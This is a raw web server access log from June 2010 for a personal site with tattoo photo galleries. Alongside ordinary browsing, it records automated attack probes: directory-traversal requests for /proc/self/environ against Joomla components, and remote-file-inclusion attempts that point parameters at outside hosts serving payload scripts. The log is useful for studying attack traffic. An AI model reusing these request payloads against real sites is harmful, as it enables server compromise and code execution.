195.194.77.202 - - [01/Jun/2010:03:36:38 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 1953 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
195.194.77.202 - - [01/Jun/2010:03:36:38 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
195.194.77.202 - - [01/Jun/2010:03:36:38 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
195.194.77.202 - - [01/Jun/2010:03:36:38 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
195.194.77.202 - - [01/Jun/2010:03:36:38 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
195.194.77.202 - - [01/Jun/2010:03:36:38 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
195.194.77.202 - - [01/Jun/2010:03:36:38 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
195.194.77.202 - - [01/Jun/2010:03:36:39 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
195.194.77.202 - - [01/Jun/2010:03:36:39 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
195.194.77.202 - - [01/Jun/2010:03:36:39 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
195.194.77.202 - - [01/Jun/2010:03:36:39 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
195.194.77.202 - - [01/Jun/2010:03:36:47 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 1778 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
195.194.77.202 - - [01/Jun/2010:03:36:47 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
195.194.77.202 - - [01/Jun/2010:03:36:47 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
195.194.77.202 - - [01/Jun/2010:03:36:47 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
195.194.77.202 - - [01/Jun/2010:03:36:47 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
195.194.77.202 - - [01/Jun/2010:03:36:48 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
195.194.77.202 - - [01/Jun/2010:03:36:48 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
195.194.77.202 - - [01/Jun/2010:03:36:48 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
195.194.77.202 - - [01/Jun/2010:03:36:48 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
195.194.77.202 - - [01/Jun/2010:03:36:48 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
195.194.77.202 - - [01/Jun/2010:03:36:48 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
195.194.77.202 - - [01/Jun/2010:03:36:56 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1600 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
195.194.77.202 - - [01/Jun/2010:03:36:56 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
195.194.77.202 - - [01/Jun/2010:03:36:56 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
195.194.77.202 - - [01/Jun/2010:03:36:56 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
195.194.77.202 - - [01/Jun/2010:03:36:56 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
195.194.77.202 - - [01/Jun/2010:03:36:56 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
195.194.77.202 - - [01/Jun/2010:03:36:56 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
195.194.77.202 - - [01/Jun/2010:03:36:56 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
195.194.77.202 - - [01/Jun/2010:03:36:56 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
195.194.77.202 - - [01/Jun/2010:03:36:56 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
195.194.77.202 - - [01/Jun/2010:03:36:57 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
67.18.167.170 - - [01/Jun/2010:03:37:00 -0500] "GET /logs/access_log.1274832000/index2.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
67.18.167.170 - - [01/Jun/2010:03:37:00 -0500] "GET /index2.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
67.18.167.170 - - [01/Jun/2010:03:37:01 -0500] "GET /logs/index2.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
195.194.77.202 - - [01/Jun/2010:03:37:01 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
195.194.77.202 - - [01/Jun/2010:03:37:02 -0500] "GET /tattoo/tate2.JPG HTTP/1.1" 200 13891 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
195.194.77.202 - - [01/Jun/2010:03:37:02 -0500] "GET /tattoo/tate4.JPG HTTP/1.1" 200 18555 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
195.194.77.202 - - [01/Jun/2010:03:37:02 -0500] "GET /tattoo/tate3.JPG HTTP/1.1" 200 16409 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
58.230.162.220 - - [01/Jun/2010:03:37:19 -0500] "GET /logs/access_log.1272240000//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://jewelhub.com/includes/respon1.txt? HTTP/1.1" 404 374 "-""Mozilla/5.0"
58.230.162.220 - - [01/Jun/2010:03:37:19 -0500] "GET /logs/access_log.1272412800//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://jewelhub.com/includes/respon1.txt? HTTP/1.1" 404 374 "-""Mozilla/5.0"
222.236.47.182 - - [01/Jun/2010:03:41:29 -0500] "GET /logs/access_log.1273017600%20%20//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://kipdyd.uni.opole.pl//podyplom/admin/scroll.gif?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
222.236.47.182 - - [01/Jun/2010:03:41:29 -0500] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://kipdyd.uni.opole.pl//podyplom/admin/scroll.gif?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
222.236.47.182 - - [01/Jun/2010:03:41:29 -0500] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://kipdyd.uni.opole.pl//podyplom/admin/scroll.gif?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
222.236.47.182 - - [01/Jun/2010:03:42:01 -0500] "GET /logs/access_log.1273017600%20%20//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://kipdyd.uni.opole.pl//podyplom/admin/scroll.gif?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
222.236.47.182 - - [01/Jun/2010:03:42:01 -0500] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://kipdyd.uni.opole.pl//podyplom/admin/scroll.gif?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
222.236.47.182 - - [01/Jun/2010:03:42:01 -0500] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://kipdyd.uni.opole.pl//podyplom/admin/scroll.gif?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
61.8.3.157 - - [01/Jun/2010:03:44:22 -0500] "GET /logs/access_log.1274832000/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.808"
61.8.3.157 - - [01/Jun/2010:03:44:23 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.808"
61.8.3.157 - - [01/Jun/2010:03:44:23 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.808"
222.236.47.182 - - [01/Jun/2010:03:45:06 -0500] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://kipdyd.uni.opole.pl//podyplom/admin/scroll.gif?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
222.236.47.182 - - [01/Jun/2010:03:45:06 -0500] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://kipdyd.uni.opole.pl//podyplom/admin/scroll.gif?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
222.236.47.182 - - [01/Jun/2010:03:45:06 -0500] "GET /logs/access_log.1273017600%20%20//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://kipdyd.uni.opole.pl//podyplom/admin/scroll.gif?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
118.129.166.213 - - [01/Jun/2010:03:45:22 -0500] "GET /logs/access_log.1273363200/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
114.108.177.125 - - [01/Jun/2010:03:46:42 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
216.227.218.240 - - [01/Jun/2010:03:49:33 -0500] "GET /logs/access_log.1274832000/?option=com_appointment&controller=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
216.227.218.240 - - [01/Jun/2010:03:49:33 -0500] "GET /logs/?option=com_appointment&controller=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 200 7797 "-""Mozilla/5.0"
216.227.218.240 - - [01/Jun/2010:03:49:33 -0500] "GET /?option=com_appointment&controller=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
123.226.235.149 - - [01/Jun/2010:03:50:58 -0500] "GET /index.php?option=com_redshop&view=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.808"
61.8.3.157 - - [01/Jun/2010:03:51:03 -0500] "GET /logs/access_log.1274832000/index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.808"
61.8.3.157 - - [01/Jun/2010:03:51:04 -0500] "GET /index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.808"
61.8.3.157 - - [01/Jun/2010:03:51:04 -0500] "GET /logs/index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.808"
94.23.20.123 - - [01/Jun/2010:03:51:18 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
94.23.20.123 - - [01/Jun/2010:03:51:18 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
64.151.192.11 - - [01/Jun/2010:03:51:25 -0500] "GET //index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
123.226.235.149 - - [01/Jun/2010:03:51:27 -0500] "GET /logs/access_log.1274832000/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.808"
123.226.235.149 - - [01/Jun/2010:03:51:27 -0500] "GET /index.php?option=com_redshop&view=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.808"
123.226.235.149 - - [01/Jun/2010:03:51:28 -0500] "GET /logs/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.808"
121.190.102.21 - - [01/Jun/2010:03:51:36 -0500] "GET /logs/access_log.1271548800///register.php/lostpasswd.php?env[include_prefix]=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 340 "-""Mozilla/5.0"
121.190.102.21 - - [01/Jun/2010:03:51:36 -0500] "GET /logs///register.php/lostpasswd.php?env[include_prefix]=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
121.190.102.21 - - [01/Jun/2010:03:51:36 -0500] "GET ///register.php/lostpasswd.php?env[include_prefix]=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
222.236.47.182 - - [01/Jun/2010:03:52:07 -0500] "GET /logs/access_log.1271548800//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://kipdyd.uni.opole.pl//podyplom/admin/scroll.gif?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
207.46.13.86 - - [01/Jun/2010:03:52:25 -0500] "GET /logs/access_log.1200182400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
114.108.177.125 - - [01/Jun/2010:03:52:32 -0500] "GET /logs/access_log.1274832000//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
114.108.177.125 - - [01/Jun/2010:03:52:33 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
114.108.177.125 - - [01/Jun/2010:03:52:33 -0500] "GET /logs//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
114.108.177.125 - - [01/Jun/2010:03:52:42 -0500] "GET /?option=com_appointment&controller=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
114.108.177.125 - - [01/Jun/2010:03:52:43 -0500] "GET /logs/?option=com_appointment&controller=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 200 7797 "-""Mozilla/5.0"
114.108.177.125 - - [01/Jun/2010:03:52:44 -0500] "GET /logs/access_log.1274832000/?option=com_appointment&controller=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
216.227.218.240 - - [01/Jun/2010:03:53:35 -0500] "GET /?option=com_redshop&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
216.227.218.240 - - [01/Jun/2010:03:53:35 -0500] "GET /logs/?option=com_redshop&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 200 7797 "-""Mozilla/5.0"
216.227.218.240 - - [01/Jun/2010:03:53:35 -0500] "GET /logs/access_log.1274832000/?option=com_redshop&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
216.227.218.240 - - [01/Jun/2010:03:53:40 -0500] "GET /logs/access_log.1274832000/?option=com_redshop&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
216.227.218.240 - - [01/Jun/2010:03:53:40 -0500] "GET /?option=com_redshop&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
216.227.218.240 - - [01/Jun/2010:03:53:40 -0500] "GET /logs/?option=com_redshop&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 200 7797 "-""Mozilla/5.0"
93.174.120.20 - - [01/Jun/2010:03:53:40 -0500] "GET /logs/access_log.1274832000%20%20/?option=com_redshop&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
93.174.120.20 - - [01/Jun/2010:03:53:40 -0500] "GET /?option=com_redshop&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
93.174.120.20 - - [01/Jun/2010:03:53:40 -0500] "GET /logs/?option=com_redshop&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 200 7797 "-""Mozilla/5.0"
93.174.120.20 - - [01/Jun/2010:03:53:41 -0500] "GET /?option=com_redshop&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
93.174.120.20 - - [01/Jun/2010:03:53:41 -0500] "GET /logs/access_log.1274832000/?option=com_redshop&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
93.174.120.20 - - [01/Jun/2010:03:53:41 -0500] "GET /logs/?option=com_redshop&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 200 7797 "-""Mozilla/5.0"
216.227.218.240 - - [01/Jun/2010:03:53:41 -0500] "GET /?option=com_redshop&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
216.227.218.240 - - [01/Jun/2010:03:53:41 -0500] "GET /logs/access_log.1274832000%20%20/?option=com_redshop&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
